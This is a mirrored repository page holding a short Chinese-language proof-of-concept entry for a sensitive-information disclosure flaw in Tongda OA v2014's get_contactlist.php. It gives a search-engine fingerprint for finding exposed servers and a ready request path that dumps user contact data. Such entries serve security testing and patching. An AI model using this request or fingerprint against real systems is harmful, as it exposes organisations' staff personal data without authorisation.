admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

31 lines
520 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞
## 漏洞描述
通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞攻击者通过漏洞可以获取敏感信息进一步攻击
## 漏洞影响
```
通达OA v2014
```
## 网络测绘
```
app="TDXK-通达OA"
```
## 漏洞复现
版本信息
![image-20220520154718609](images/202205201547687.png)
验证POC
```
/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3
```
![image-20220520154741599](images/202205201547656.png)
Reference in New Issue View Git Blame Copy Permalink